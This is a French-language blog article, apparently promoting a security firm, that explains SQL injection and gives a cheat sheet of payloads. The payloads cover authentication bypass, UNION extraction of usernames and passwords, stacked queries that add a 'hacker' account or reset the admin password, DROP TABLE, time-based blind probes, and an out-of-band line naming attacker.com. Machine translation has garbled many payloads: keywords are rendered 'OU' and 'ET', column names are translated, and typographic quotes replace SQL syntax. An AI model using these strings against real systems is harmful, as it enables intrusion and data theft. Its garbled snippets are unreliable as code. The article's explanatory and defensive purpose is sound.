Dans le paysage numérique actuel, la sécurité des données est de la plus haute importance. Cependant, certaines vulnérabilités peuvent exposer des informations sensibles, et l’une de ces vulnérabilités est l’injection SQL ou SQLI. Nous nous pencherons ici sur les subtilités des attaques par injection SQL, nous comprendrons comment elles fonctionnent et nous explorerons les mesures pratiques pour les prévenir. Nous vous fournirons également une fiche complète sur les injections SQL pour vous aider à protéger votre base de données.

Qu’est-ce que l’injection SQL ?

Une vulnérabilité de sécurité web permet à des attaquants de manipuler la base de données d’un site web en injectant du code SQL malveillant à travers les champs de saisie de l’utilisateur. La vulnérabilité survient lorsque l’entrée de l’utilisateur n’est pas correctement validée ou assainie avant d’être utilisée dans des requêtes SQL.

Lorsqu’une application web ne parvient pas à valider ou à assainir les entrées des utilisateurs, un attaquant peut exploiter cette vulnérabilité en insérant des commandes SQL dans les champs d’entrée.

Ces commandes injectées peuvent modifier le comportement prévu de la requête SQL, ce qui peut entraîner un accès non autorisé, une fuite de données, voire une compromission complète du système.

Vulnérabilités d’injection SQL

Validation des entrées

La validation inadéquate des entrées est une cause fréquente de vulnérabilité aux injections SQL. Lorsque l’entrée utilisateur n’est pas validée correctement, les attaquants peuvent soumettre une entrée malveillante qui inclut des instructions SQL ou des fragments, contournant ainsi les contraintes prévues.

Messages d’erreur

Les messages d’erreur renvoyés par une application web peuvent également fournir aux attaquants des informations précieuses. Les messages d’erreur détaillés qui révèlent des erreurs de schéma de base de données ou de syntaxe SQL peuvent aider les attaquants à concevoir des attaques par injection SQL réussies.

Injection SQL aveugle

L’injection SQL aveugle se produit lorsqu’un attaquant ne peut pas voir directement le résultat d’une requête mais peut déduire des informations sur la base de la réponse de l’application. Cette technique est souvent utilisée lorsque les attaques basées sur les erreurs ou sur le temps ne sont pas viables.

Techniques d’attaque par injection SQL

Injection SQL basée sur l’union

L’injection SQL basée sur l’union est une technique par laquelle un attaquant combine les résultats de plusieurs requêtes SQL pour extraire des informations de la base de données. Un pirate peut extraire des données de différentes tables ou colonnes en exploitant l’opérateur UNION.

Injection SQL basée sur des booléens

L’injection SQL booléenne consiste à manipuler le comportement de l’application en fonction de la véracité ou de la fausseté des conditions SQL injectées. L’attaquant peut déduire des informations en construisant des requêtes SQL qui évaluent si elles sont vraies ou fausses.

Injection SQL basée sur le temps

L’injection SQL temporelle exploite les délais de réponse de l’application pour en déduire des informations sur la base de données. En introduisant des délais conditionnels, l’attaquant peut évaluer la véracité des instructions SQL injectées.

Aide-mémoire sur l’injection SQL

1. Commentaires :

• ou 1=1 —
• ‘ ou 1=1 /*

1. Injection booléenne :

• OU « 1 »= »1″ —
• ET « 1 »= »0″ —

1. Injection à base d’Union :

• ‘ UNION SELECT null, null, database() —
• UNION SELECT null, table_name, null FROM information_schema.tables —

1. Injection basée sur les erreurs :

• ‘ OR 1/0 —
• OR ‘a’=’a’ LIMIT 1 OFFSET 1 —

1. Injection dans le temps :

• OU SLEEP(5) —
• ‘ OR (SELECT COUNT(*) FROM sys.objects WHERE type = ‘U’ AND CHARINDEX(‘admin’, name) > 0) > 0 —

1. UNION SELECT :

• UNION SELECT nom d’utilisateur, mot de passe FROM utilisateurs —
• UNION SELECT nom_table, nom_colonne FROM information_schema.columns —

1. Requêtes empilées :

• ‘ ; INSERT INTO users (username, password) VALUES (‘hacker’, ‘password’) ; —
• ‘ ; UPDATE users SET password=’hacked’ WHERE username=’admin’ ; —

1. Injection hors bande (OOB) :

• OR DNS_NAME() = ‘attacker.com’ —
• ‘ OR (SELECT LOAD_FILE(‘c:/path/to/file’)) IS NOT NULL —

1. Injection aveugle à base booléenne : Exploiter les conditions booléennes pour déduire des informations sans sortie directe.

• ‘ OR LENGTH(database()) > 1 —
• ‘ OR (SELECT COUNT(*) FROM users) = 10 —

1. Injection aveugle basée sur le temps : Retarder les requêtes pour extraire des informations en fonction du temps de réponse.

• ‘ OR (SELECT IF(SUBSTRING(database(), 1, 1) = ‘a’, SLEEP(5), 0)) —
• ‘ OR (SELECT IF((SELECT COUNT(*) FROM users) > 10, SLEEP(5), 0)) —

Charges utiles d’injection SQL

Pour aider à comprendre et à tester les vulnérabilités liées à l’injection de code SQL, voici quelques charges utiles courantes d’injection de code SQL :

• OR 1=1 —
• 1″ OU « 1 »= »1
• admin’ —
• 1′ ; DROP TABLE users ; —

Commandes courantes d’injection SQL

• SELECT : Utilisé pour extraire des données de la base de données.
• INSERT INTO : permet d’insérer des données dans une table.
• UPDATE : permet de modifier des données existantes.
• DELETE FROM : Utilisé pour supprimer des données d’une table.

Exemples d’injection SQL

Exemple simple d’injection SQL

Prenons l’exemple d’un formulaire de connexion comportant des champs pour le nom d’utilisateur et le mot de passe. Si l’entrée n’est pas correctement validée, un pirate peut saisir ‘ OR ‘1’=’1 comme nom d’utilisateur, contournant ainsi le processus d’authentification et obtenant un accès non autorisé.

Exemple avancé d’injection SQL

Dans des scénarios plus complexes, les attaquants peuvent exploiter l’injection SQL pour extraire des informations sensibles, modifier les enregistrements de la base de données ou exécuter des commandes arbitraires sur le serveur sous-jacent. Ces attaques nécessitent une compréhension approfondie de la structure de la base de données et de la logique d’interrogation de l’application.

Conclusion

L’antisèche sur l’injection SQL fournit une collection de techniques et de charges utiles couramment utilisées pour exploiter les vulnérabilités des applications web. Il s’agit d’une ressource utile pour apprendre comment les attaquants peuvent manipuler les requêtes SQL pour obtenir un accès non autorisé aux bases de données et extraire des informations sensibles.

Cependant, il est essentiel d’aborder ces connaissances de manière responsable et éthique. L’utilisation non autorisée de ces techniques peut avoir de graves conséquences, y compris des répercussions juridiques. Il est toujours recommandé d’obtenir une autorisation appropriée et d’effectuer des tests de sécurité dans un environnement contrôlé.

Si vous êtes préoccupé par la sécurité des applications web et que vous souhaitez une assistance professionnelle, envisagez de contacter Nextdoorsec, une société de cybersécurité réputée.